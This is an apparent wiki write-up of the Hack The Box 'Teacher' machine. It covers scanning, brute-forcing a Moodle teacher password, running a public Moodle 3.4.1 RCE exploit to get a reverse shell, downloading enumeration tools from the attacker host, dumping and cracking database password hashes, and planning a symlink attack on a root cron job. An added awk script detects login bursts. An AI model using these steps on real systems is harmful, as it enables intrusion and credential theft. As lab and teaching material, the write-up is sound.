Teacher

From Luniwiki


Teacher01.png

Ports scan

u505@kali:~/HTB/Machines/Teacher$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.153 --rate=1000
[sudo] password for u505: 

Starting masscan 1.0.5 at 2020-02-17 15:06:13 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.153


u505@kali:~/HTB/Machines/Teacher$ nmap -sC -sV 10.10.10.153
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 10:06 EST
Nmap scan report for teacher.htb (10.10.10.153)
Host is up (0.038s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds

Web enumeration

Teacher02.png

u505@kali:~/HTB/Machines/Teacher$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,png,css,js" -r -f -t 50 -u http://10.10.10.153 --plain-text-report=dirsearch.txt

dirsearch v0.3.9
Extensions: txt, png, css, js | HTTP method: get | Threads: 50 | Wordlist size: 23054 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-02-17_10-16-55.log
Target: http://10.10.10.153
[10:16:55] Starting: [10:16:55] 403 - 300B - /.htpasswd.css [10:16:55] 403 - 299B - /.htpasswd.js [10:16:59] 403 - 300B - /.htpasswd.png [10:16:59] 403 - 300B - /.htpasswd.txt [10:17:11] 200 - 931B - /css/ [10:17:19] 200 - 3KB - /fonts/ [10:17:23] 403 - 293B - /icons/ [10:17:23] 200 - 15KB - /images/ [10:17:26] 403 - 298B - /javascript/ [10:17:26] 200 - 1KB - /js/ [10:17:30] 200 - 626B - /manual/ [10:17:33] 200 - 26KB - /moodle/ [10:17:38] 403 - 298B - /phpmyadmin/ [10:17:48] 403 - 301B - /server-status/ [10:18:04] Starting: css/ [10:18:04] 403 - 304B - /css/.htpasswd.css [10:18:04] 403 - 303B - /css/.htpasswd.js [10:18:04] 403 - 304B - /css/.htpasswd.png [10:18:04] 403 - 304B - /css/.htpasswd.txt [10:18:48] 200 - 34KB - /css/style.css [10:18:57] Starting: fonts/ [10:18:57] 403 - 306B - /fonts/.htpasswd.png [10:18:57] 403 - 306B - /fonts/.htpasswd.txt [10:18:57] 403 - 306B - /fonts/.htpasswd.css [10:18:57] 403 - 305B - /fonts/.htpasswd.js [10:19:49] Starting: icons/ [10:19:50] 403 - 306B - /icons/.htpasswd.css [10:19:50] 403 - 305B - /icons/.htpasswd.js [10:19:50] 403 - 306B - /icons/.htpasswd.png [10:19:50] 403 - 306B - /icons/.htpasswd.txt [10:19:54] 200 - 306B - /icons/a.png [10:19:59] 200 - 308B - /icons/back.png [10:20:00] 200 - 310B - /icons/binary.png [10:20:01] 200 - 215B - /icons/blank.png [10:20:01] 200 - 320B - /icons/broken.png [10:20:02] 200 - 299B - /icons/c.png [10:20:06] 200 - 1KB - /icons/compressed.png [10:20:09] 200 - 295B - /icons/dir.png [10:20:10] 200 - 256B - /icons/down.png [10:20:13] 200 - 296B - /icons/f.png [10:20:14] 200 - 295B - /icons/folder.png [10:20:15] 200 - 308B - /icons/forward.png [10:20:16] 200 - 275B - /icons/generic.png [10:20:18] 200 - 332B - /icons/index.png [10:20:21] 200 - 323B - /icons/layout.png [10:20:21] 200 - 257B - /icons/left.png [10:20:21] 200 - 314B - /icons/link.png [10:20:24] 200 - 272B - /icons/movie.png [10:20:27] 200 - 298B - /icons/p.png [10:20:27] 200 - 310B - /icons/patch.png [10:20:27] 200 - 304B - 
/icons/pdf.png [10:20:28] 200 - 319B - /icons/portal.png [10:20:30] 200 - 303B - /icons/ps.png [10:20:32] 200 - 254B - /icons/right.png [10:20:32] 200 - 290B - /icons/script.png [10:20:34] 403 - 299B - /icons/small/ [10:20:37] 200 - 261B - /icons/tar.png [10:20:38] 200 - 288B - /icons/text.png [10:20:39] 200 - 334B - /icons/transfer.png [10:20:41] 200 - 255B - /icons/up.png [10:20:45] 200 - 1KB - /icons/xml.png [10:20:46] Starting: images/ [10:20:46] 403 - 307B - /images/.htpasswd.txt [10:20:46] 403 - 307B - /images/.htpasswd.png [10:20:47] 403 - 307B - /images/.htpasswd.css [10:20:47] 403 - 306B - /images/.htpasswd.js [10:20:48] 200 - 5KB - /images/1.png [10:20:48] 200 - 7KB - /images/2.png [10:20:48] 200 - 9KB - /images/3.png [10:20:48] 200 - 5KB - /images/4.png [10:20:49] 200 - 200B - /images/5.png [10:21:16] 200 - 4KB - /images/logo.png [10:21:43] Starting: javascript/ [10:21:43] 403 - 311B - /javascript/.htpasswd.txt [10:21:44] 403 - 310B - /javascript/.htpasswd.js [10:21:44] 403 - 311B - /javascript/.htpasswd.png [10:21:44] 403 - 311B - /javascript/.htpasswd.css [10:22:09] 403 - 305B - /javascript/jquery/ [10:22:37] Starting: js/ [10:22:38] 403 - 303B - /js/.htpasswd.txt [10:22:38] 403 - 303B - /js/.htpasswd.png [10:22:38] 403 - 302B - /js/.htpasswd.js [10:22:38] 403 - 303B - /js/.htpasswd.css [10:23:16] 200 - 3KB - /js/main.js [10:23:25] 200 - 44KB - /js/plugins.js [10:23:46] Starting: manual/ [10:23:47] 403 - 306B - /manual/.htpasswd.js [10:23:47] 403 - 307B - /manual/.htpasswd.png [10:23:47] 403 - 307B - /manual/.htpasswd.css [10:23:47] 403 - 307B - /manual/.htpasswd.txt [10:24:05] 200 - 9KB - /manual/da/ [10:24:06] 200 - 9KB - /manual/de/ [10:24:10] 200 - 9KB - /manual/en/ [10:24:11] 200 - 10KB - /manual/es/ [10:24:14] 200 - 9KB - /manual/fr/ [10:24:18] 200 - 10KB - /manual/images/ [10:24:21] 200 - 10KB - /manual/ja/ [10:24:22] 200 - 8KB - /manual/ko/ [10:24:43] 200 - 3KB - /manual/style/ [10:24:45] 200 - 9KB - /manual/tr/ [10:24:48] 200 - 9KB - 
/manual/zh-cn/ [10:24:48] Starting: moodle/ [10:24:49] 403 - 307B - /moodle/.htpasswd.png [10:24:49] 403 - 307B - /moodle/.htpasswd.css [10:24:49] 403 - 306B - /moodle/.htpasswd.js [10:24:49] 403 - 307B - /moodle/.htpasswd.txt [10:24:51] 200 - 1KB - /moodle/analytics/ [10:24:51] 303 - 448B - /moodle/admin/ [10:24:52] 200 - 0B - /moodle/auth/ [10:24:52] 200 - 4KB - /moodle/backup/ [10:24:53] 200 - 1B - /moodle/blocks/ [10:24:53] 200 - 3KB - /moodle/cache/ [10:24:53] 303 - 440B - /moodle/blog/ [10:24:54] 303 - 442B - /moodle/calendar/ [10:24:56] 303 - 440B - /moodle/comment/ [10:24:59] 200 - 27KB - /moodle/course/ [10:25:07] 303 - 440B - /moodle/files/ [10:25:07] 200 - 1B - /moodle/filter/ [10:25:14] 200 - 26KB - /moodle/index.php/ [10:25:15] 200 - 2KB - /moodle/install/ [10:25:17] 200 - 1KB - /moodle/lang/ [10:25:18] 200 - 1B - /moodle/lib/ [10:25:19] 200 - 1KB - /moodle/local/ [10:25:20] 200 - 27KB - /moodle/login/ [10:25:22] 200 - 1KB - /moodle/media/ [10:25:22] 303 - 440B - /moodle/message/ [10:25:23] 200 - 0B - /moodle/mod/ [10:25:24] 303 - 440B - /moodle/my/ [10:25:25] 303 - 440B - /moodle/notes/ [10:25:30] 200 - 7KB - /moodle/pix/ [10:25:31] 200 - 2KB - /moodle/portfolio/ [10:25:34] 200 - 6KB - /moodle/question/ [10:25:34] 200 - 1KB - /moodle/README.txt [10:25:35] 200 - 4KB - /moodle/report/ [10:25:35] 200 - 7KB - /moodle/repository/ [10:25:36] 200 - 1KB - /moodle/rss/ [10:25:36] 200 - 26KB - /moodle/search/ [10:25:42] 303 - 440B - /moodle/tag/ [10:25:43] 303 - 440B - /moodle/theme/ [10:25:48] 200 - 3KB - /moodle/webservice/ [10:25:51] Starting: phpmyadmin/ [10:27:11] Starting: server-status/
Task Completed

Teacher03.png

Moodle is a free and open-source learning management system (LMS) written in PHP and distributed under the GNU General Public License. Developed on pedagogical principles, Moodle is used for blended learning, distance education, flipped classroom and other e-learning projects in schools, universities, workplaces and other sectors.

With customizable management features, it is used to create private websites with online courses for educators and trainers to achieve learning goals. Moodle (acronym for modular object-oriented dynamic learning environment) allows for extending and tailoring learning environments using community-sourced plugins.

Page gallery.html

Teacher04.png

If we take a look at the source code of the page:

Teacher05.png

u505@kali:~/HTB/Machines/Teacher$ curl http://teacher.htb/gallery.html
 <!DOCTYPE html>
 <!--[if IE 8]> <html class="ie8 oldie" lang="en"> <![endif]-->
 <!--[if gt IE 8]><!--> <html lang="en"> <!--<![endif]-->
 <head>
         <meta charset="utf-8">
         <title>Blackhat Highschool</title>
         <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no">
         <link rel="stylesheet" media="all" href="css/style.css">
         <!--[if lt IE 9]>
                 <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
         <![endif]-->
 </head>
 <body>
 ...
                                                 <li>
                                                         <div class="slide">
                                                                 <ul>
                                                                         <li><a href="#"><img src="images/5.png" onerror="console.log('That\'s an F');" alt=""></a></li>
                                                                         <li><a href="#"><img src="images/5_2.png" alt=""></a></li>
                                                                         <li><a href="#"><img src="images/5_3.png" alt=""></a></li>
                                                                         <li><a href="#"><img src="images/5_4.png" alt=""></a></li>
                                                                         <li><a href="#"><img src="images/5_5.png" alt=""></a></li>
 ...

The image images/5.png is not rendered (note the onerror handler attached to it), so we download it and inspect it.

u505@kali:~/HTB/Machines/Teacher$ wget -q http://teacher.htb/images/5.png
u505@kali:~/HTB/Machines/Teacher$ file 5.png
5.png: ASCII text
u505@kali:~/HTB/Machines/Teacher$ cat 5.png
Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks, Giovanni

Find the Moodle password with Burp

We need a list of candidate characters to test as the last character of the password.

u505@kali:~/HTB/Machines/Teacher$ cat generatelist.sh
#!/bin/bash
for car in {{a..z},{A..Z},{0..9}}
do
echo $car
done
u505@kali:~/HTB/Machines/Teacher$ chmod +x generatelist.sh
u505@kali:~/HTB/Machines/Teacher$ ./generatelist.sh > list
u505@kali:~/HTB/Machines/Teacher$ cat /usr/share/seclists/Fuzzing/special-chars.txt >> list

We start Burp Suite to intercept the login request.

Teacher06.png

We send the request to the Intruder module.

Teacher07.png

In Intruder we clear all payload positions, add one on the last character of the password, and remove the Cookie header.

Teacher08.png

On the payload tab, we load our list of characters, and start the attack.

Teacher09.png

During the attack, the response length is always the same except for the character #.

Teacher10.png

Find the Moodle password without Burp

Another way is to write our own script that checks each candidate password from the command line.

u505@kali:~/HTB/Machines/Teacher$ vi testlogin.sh
u505@kali:~/HTB/Machines/Teacher$ cat testlogin.sh
#!/bin/bash
# Try every candidate last character from "list" against the Moodle login and
# record the size of each response: a wrong password always produces the same
# page, so the one candidate with a different response size is the right one.
# Candidates such as &, =, + or % would also need URL-encoding in POSTVAL;
# this script sends them raw, so they are not tested correctly.
NUM=1
while read -r car
do
USER=giovanni
PASS="Th4C00lTheacha${car}"
POSTVAL="anchor=&username=${USER}&password=${PASS}"
LENPSTVAL=${#POSTVAL}
echo "Testing $USER $PASS" > result/test${NUM}.out
# '%s' keeps printf from treating a '%' candidate as a format character
printf '%s' "Testing $USER $PASS"
# fetch a fresh MoodleSession cookie for every attempt
MoodleSession=`curl -i -s -k -X 'GET' -H 'Host: 10.10.10.153' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Connection: close' -H 'Upgrade-Insecure-Requests: 1' 'http://10.10.10.153/moodle/login/index.php' | grep "Set-Cookie: MoodleSession" | cut -d '=' -f 2 | cut -d ';' -f 1`
# post the credentials with that cookie and append the full response to the result file
curl -i -s -k -X 'POST' -H 'Host: 10.10.10.153' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Referer: http://10.10.10.153/moodle/login/index.php' -H 'Content-Type: application/x-www-form-urlencoded' -H "Content-Length: ${LENPSTVAL}" -H 'DNT: 1' -H 'Connection: close' -H "Cookie: MoodleSession=${MoodleSession}" -H 'Upgrade-Insecure-Requests: 1' -b "MoodleSession=${MoodleSession}" --data-binary "${POSTVAL}" 'http://10.10.10.153/moodle/login/index.php' >> result/test${NUM}.out
printf " --- file name: test${NUM}.out -- file length: %s\n" "`ls -l result/test${NUM}.out | awk '{print $5}'`"
NUM=`expr $NUM + 1`
done < list
u505@kali:~/HTB/Machines/Teacher$ chmod +x testlogin.sh
u505@kali:~/HTB/Machines/Teacher$ mkdir result
u505@kali:~/HTB/Machines/Teacher$ ./testlogin.sh
Testing giovanni Th4C00lTheachaa --- file name: test1.out -- file lenth: 834
Testing giovanni Th4C00lTheachab --- file name: test2.out -- file lenth: 834
...
Testing giovanni Th4C00lTheacha@ --- file name: test65.out -- file lenth: 834
Testing giovanni Th4C00lTheacha# --- file name: test66.out -- file lenth: 1028
Testing giovanni Th4C00lTheacha$ --- file name: test67.out -- file lenth: 834
./testlogin.sh: line 13: printf: `%': missing format character
Testing giovanni Th4C00lTheacha --- file name: test68.out -- file lenth: 834
Testing giovanni Th4C00lTheacha^ --- file name: test69.out -- file lenth: 834
...
Testing giovanni Th4C00lTheacha< --- file name: test92.out -- file lenth: 834
Testing giovanni Th4C00lTheacha> --- file name: test93.out -- file lenth: 834

We can see that the file length differs for the password Th4C00lTheacha#. Our script fails for the character % because printf treats it as the start of a format specifier.
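From the defender's side, a guessing run like this one leaves an obvious trace in the web server log: one client, one minute, dozens of POSTs to the same login page. The following is an added example, not part of the write-up: an awk check over Apache combined-format log lines that flags any client exceeding a threshold of login POSTs within a minute. The log lines, addresses, timestamps, status codes and sizes are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the write-up. Flags clients that POST to the Moodle
# login page more than a threshold number of times within one minute, which is
# what character-by-character password guessing looks like in Apache's
# combined access log. The sample log below is constructed.

# Usage: flag_login_bursts LOGFILE [THRESHOLD]
# Prints "ip minute count" for every client/minute pair above the threshold.
flag_login_bursts() {
    awk -v thr="${2:-20}" '
        # In combined format, field 6 is the quoted method, field 7 the path.
        $6 == "\"POST" && $7 ~ /^\/moodle\/login\/index\.php/ {
            # $4 looks like [17/Feb/2020:10:30:01 ; drop the "[" and the seconds
            # so that requests are bucketed per client and per minute.
            minute = substr($4, 2, 17)
            n[$1 SUBSEP minute]++
        }
        END {
            for (k in n)
                if (n[k] > thr) {
                    split(k, f, SUBSEP)
                    print f[1], f[2], n[k]
                }
        }' "$1" | sort
}

# Writes a constructed log to $1: 93 login POSTs from one client inside one
# minute (one per candidate in the list used above) plus ordinary traffic
# from a second client that should not be flagged.
make_sample_log() {
    out="$1"
    : > "$out"
    i=1
    while [ "$i" -le 93 ]; do
        printf '10.10.14.26 - - [17/Feb/2020:10:30:%02d -0500] "POST /moodle/login/index.php HTTP/1.1" 303 834 "-" "curl/7.67.0"\n' \
            $(( i % 60 )) >> "$out"
        i=$(( i + 1 ))
    done
    printf '10.10.14.7 - - [17/Feb/2020:10:30:05 -0500] "GET /moodle/login/index.php HTTP/1.1" 200 26432 "-" "Mozilla/5.0"\n' >> "$out"
    printf '10.10.14.7 - - [17/Feb/2020:10:30:09 -0500] "POST /moodle/login/index.php HTTP/1.1" 303 440 "-" "Mozilla/5.0"\n' >> "$out"
}
```

Run against a real access log, the same check is `flag_login_bursts /var/log/apache2/access.log 20`; Moodle's own account lockout threshold is the matching preventive control.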

Moodle vulnerability

We now have access to the Moodle application as a teacher.

Teacher11.png

u505@kali:~/HTB/Machines/Teacher$ searchsploit moodle
---------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                  |  Path
                                                                | (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
Mambo Component Mam-Moodle alpha - Remote File Inclusion        | exploits/php/webapps/2064.txt
Moodle - Remote Command Execution (Metasploit)                  | exploits/linux/remote/29324.rb
Moodle 1.1/1.2 - Cross-Site Scripting                           | exploits/php/webapps/24071.txt
Moodle 1.5.2 - 'moodledata' Remote Session Disclosure           | exploits/php/webapps/3508.txt
Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Sc | exploits/php/webapps/29284.txt
Moodle 1.6dev - SQL Injection / Command Execution               | exploits/php/webapps/1312.php
Moodle 1.7.1 - 'index.php' Cross-Site Scripting                 | exploits/php/webapps/30261.txt
Moodle 1.8.3 - 'install.php' Cross-Site Scripting               | exploits/php/webapps/31020.txt
Moodle 1.8.4 - Remote Code Execution                            | exploits/php/webapps/6356.php
Moodle 1.9.3 - Remote Code Execution                            | exploits/php/webapps/7437.txt
Moodle 1.x - 'post.php' Cross-Site Scripting                    | exploits/php/webapps/24356.txt
Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting          | exploits/php/webapps/35297.txt
Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities                   | exploits/php/webapps/28174.txt
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site | exploits/php/webapps/36418.txt
Moodle 2.7 - Persistent Cross-Site Scripting                    | exploits/php/webapps/34169.txt
Moodle 2.x/3.x - SQL Injection                                  | exploits/php/webapps/41828.php
Moodle 3.4.1 - Remote Code Execution                            | exploits/php/webapps/46551.php
Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metas | exploits/php/remote/46775.rb
Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure              | exploits/php/webapps/8297.txt
Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection               | exploits/php/webapps/28770.txt
Moodle Filepicker 3.5.2 - Server Side Request Forgery           | exploits/php/webapps/47177.txt
Moodle Help Script 1.x - Cross-Site Scripting                   | exploits/php/webapps/24279.txt
Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scrip | exploits/php/webapps/46881.txt
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Teacher$ searchsploit -m 46551
 Exploit: Moodle 3.4.1 - Remote Code Execution
     URL: https://www.exploit-db.com/exploits/46551
    Path: /usr/share/exploitdb/exploits/php/webapps/46551.php
File Type: C++ source, ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Teacher/46551.php

To run this exploit we need valid credentials for a teacher account and a valid course id.

Teacher12.png

Start a listener

u505@kali:~/HTB/Machines/Teacher$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Run the Evil Teacher exploit

u505@kali:~/HTB/Machines/Teacher$ php 46551.php url=http://10.10.10.153/moodle/ user=giovanni pass="Th4C00lTheacha#" ip=10.10.14.26 port=4444 course=2
PHP Notice:  Undefined index: course in /opt/HTB/Machines/Teacher/46551.php on line 508

*------------------------------*
* Noodle [Moodle RCE] (v3.4.1) *
*------------------------------*
[!] Make sure you have a listener
[!] at 10.10.14.26:4444
[*] Logging in as user giovanni with password Th4C00lTheacha#
PHP Fatal error:  Uncaught Error: Call to undefined function exploit\curl_init() in /opt/HTB/Machines/Teacher/46551.php:417
Stack trace:
#0 /opt/HTB/Machines/Teacher/46551.php(105): exploit\moodle->httpPost('/login/index.ph...', Array)
#1 /opt/HTB/Machines/Teacher/46551.php(84): exploit\moodle->login('http://10.10.10...', 'giovanni', 'Th4C00lTheacha#')
#2 /opt/HTB/Machines/Teacher/46551.php(511): exploit\moodle->__construct('http://10.10.10...', 'giovanni', 'Th4C00lTheacha#', '10.10.14.26', '4444', NULL, false)
#3 {main}
  thrown in /opt/HTB/Machines/Teacher/46551.php on line 417

We check the source code at the failing line:

u505@kali:~/HTB/Machines/Teacher$ vi +417 46551.php
           $curl = curl_init(sprintf("%s%s", $this->url, $url));

The PHP curl extension is not installed, so we install it:

u505@kali:~/HTB/Machines/Teacher$ sudo apt install php-curl

And we run the exploit again:

u505@kali:~/HTB/Machines/Teacher$ php 46551.php url=http://10.10.10.153/moodle/ user=giovanni pass="Th4C00lTheacha#" ip=10.10.14.26 port=4444 course=2

*------------------------------*
* Noodle [Moodle RCE] (v3.4.1) *
*------------------------------*
[!] Make sure you have a listener
[!] at 10.10.14.26:4444
[*] Logging in as user giovanni with password Th4C00lTheacha#
[+] Successful Login
[>] Moodle Session 94i0d563nrguesgdhddnbt02n6
[>] Moodle Key ekQgRg8Bfc
[*] Loading Course ID 2
[+] Successfully Loaded Course
[*] Enable Editing
[+] Successfully Enabled Course Editing
[*] Adding Quiz
[+] Successfully Added Quiz
[*] Configuring New Quiz
[+] Successfully Configured Quiz
[*] Loading Edit Quiz Page
[+] Successfully Loaded Edit Quiz Page
[*] Adding Calculated Question
[+] Successfully Added Calculation Question
[*] Adding Evil Question
[+] Successfully Created Evil Question
[*] Sending Exploit
[>] You should receive a reverse shell attempt from the target at 10.10.14.26 on port 4444
[>] If connection was successful this program will wait here until you close the connection.
[>] You should be able to Ctrl+C and retain the connection through netcat.

The listener receives a reverse shell:

u505@kali:~/HTB/Machines/Teacher$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.153.
Ncat: Connection from 10.10.10.153:36368.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@teacher:/var/www/html/moodle/question$ stty raw -echo
stty raw -echo

Local enumeration

As usual, we upload tools to enumerate the local machine.

u505@kali:~/HTB/Machines/Teacher$ mkdir www
u505@kali:~/HTB/Machines/Teacher$ cd www/
u505@kali:~/HTB/Machines/Teacher/www$ cp /opt/utils/pspy/pspy64 ./
u505@kali:~/HTB/Machines/Teacher/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/Teacher/www$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

From the target box

www-data@teacher:/var/www/html/moodle/question$ cd /tmp/
www-data@teacher:/tmp$ wget -q http://10.10.14.26/pspy64
www-data@teacher:/tmp$ wget -q http://10.10.14.26/LinEnum.sh
www-data@teacher:/tmp$ chmod +x pspy64 LinEnum.sh

LinEnum.sh doesn't provide useful information. The Moodle configuration file, however, contains the database credentials:

www-data@teacher:/var/www/html/moodle$ cat config.php
...
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'root';
$CFG->dbpass    = 'Welkom1!';
...

In the moodle database we can read the mdl_user table:

www-data@teacher:/var/www/html/moodle$ mysql -p -u root
Enter password: Welkom1!

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 102
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use moodle
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [moodle]> select username,password from mdl_user;
+-------------+--------------------------------------------------------------+
| username    | password                                                     |
+-------------+--------------------------------------------------------------+
| guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af                             |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)

Three of the hashes are bcrypt ($2y$), which is deliberately expensive to brute-force, but the password of the Giovannibak account is a raw MD5 hash that is very easy to run through a dictionary attack.

Meanwhile, pspy64 (uploaded earlier) shows the following process activity on the box:

2020/02/17 20:11:01 CMD: UID=0    PID=1780   | /usr/sbin/CRON -f
2020/02/17 20:11:01 CMD: UID=0    PID=1781   | /usr/sbin/CRON -f
2020/02/17 20:11:01 CMD: UID=0    PID=1782   | /bin/sh -c /usr/bin/backup.sh
2020/02/17 20:11:01 CMD: UID=0    PID=1783   | tar -czvf tmp/backup_courses.tar.gz courses/algebra
2020/02/17 20:11:01 CMD: UID=0    PID=1784   | tar -czvf tmp/backup_courses.tar.gz courses/algebra
2020/02/17 20:11:01 CMD: UID=0    PID=1785   | gzip
2020/02/17 20:11:01 CMD: UID=0    PID=1786   | /bin/bash /usr/bin/backup.sh
2020/02/17 20:11:01 CMD: UID=0    PID=1787   | tar -xf backup_courses.tar.gz
2020/02/17 20:11:01 CMD: UID=0    PID=1788   | /bin/bash /usr/bin/backup.sh

pspy reveals a periodic task that runs as root (UID=0):

www-data@teacher:/var/www/html/moodle$ cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

But as www-data we are not allowed to enter these folders.

www-data@teacher:/var/www/html/moodle$ cd /home/giovanni/work
bash: cd: /home/giovanni/work: Permission denied


Cracking the hash

u505@kali:~/HTB/Machines/Teacher$ vi hash.txt
u505@kali:~/HTB/Machines/Teacher$ cat hash.txt
7a860966115182402ed06375cf0a22af
u505@kali:~/HTB/Machines/Teacher$ hashcat -m 0 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v5.1.0) starting...

* Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss.
             You can use --force to override, but do not report related errors.
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 960M, 501/2004 MB allocatable, 5MCU

OpenCL Platform #2: The pocl project
====================================
* Device #2: pthread-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=500 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=0 -D _unroll'
* Device #1: Kernel m00000_a0-pure.408c2795.kernel not found in cache! Building may take a while...

Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

7a860966115182402ed06375cf0a22af:expelled

Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: 7a860966115182402ed06375cf0a22af
Time.Started.....: Mon Feb 17 14:04:13 2020 (0 secs)
Time.Estimated...: Mon Feb 17 14:04:13 2020 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12721.4 kH/s (2.56ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 983040/14344384 (6.85%)
Rejected.........: 0/983040 (0.00%)
Restore.Point....: 655360/14344384 (4.57%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: grass4 -> computer?
Hardware.Mon.#1..: Temp: 43c Util: 17% Core:1137MHz Mem:2505MHz Bus:16

Started: Mon Feb 17 14:04:09 2020
Stopped: Mon Feb 17 14:04:15 2020

The password is cracked nearly instantly.

User flag

www-data@teacher:/var/www/html/moodle$ su - giovanni
Password: expelled

giovanni@teacher:~$ whoami
giovanni
giovanni@teacher:~$ cat user.txt
<USER_FLAG>

Privilege escalation

As user giovanni we can access the folder /home/giovanni/work.

giovanni@teacher:~/work$ cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

This script is simple. We could, for example, link the folder /home/giovanni/work/courses to /root; the backup would then include the root flag, but we would not really own the machine. Another strategy is to link the folder /home/giovanni/work/tmp to /etc: the command chmod 777 * -R then runs against /etc as root, gives us full access to it, and lets us modify critical files.

giovanni@teacher:~/work$ ls -ltr
total 8
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 tmp
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 courses
